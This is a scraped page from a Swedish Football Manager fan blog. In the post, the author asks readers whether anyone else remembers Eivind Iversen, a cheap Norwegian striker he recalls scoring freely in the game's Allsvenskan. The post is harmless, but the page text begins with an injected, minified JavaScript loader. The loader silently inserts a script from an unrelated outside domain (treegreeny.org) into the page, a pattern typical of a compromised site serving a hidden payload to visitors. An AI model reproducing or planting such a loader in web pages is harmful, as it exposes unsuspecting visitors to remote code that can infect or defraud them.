;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lirare vi minns: Eivind Iversen – FMSweden
Meny Stäng

Lirare vi minns: Eivind Iversen

Den här gången kommer jag inte berätta om någon spelare utan jag kommer snarare efterlysa en. När jag var liten minns jag att det fanns en ung norsk anfallare som hette Eivind Iversen som man kunde köpa billigt och som spottade in mål i Allsvenskan direkt. Problemet är att jag inte kan hitta någon information om honom hur jag än letar. Jag kan ju knappast ha drömt det?

Så detta är ett försök att involvera er lite, är det någon mer än jag som minns Eivind Iversen?

Please wait...

Liknande Inlägg

2 kommentarer

Lämna ett svar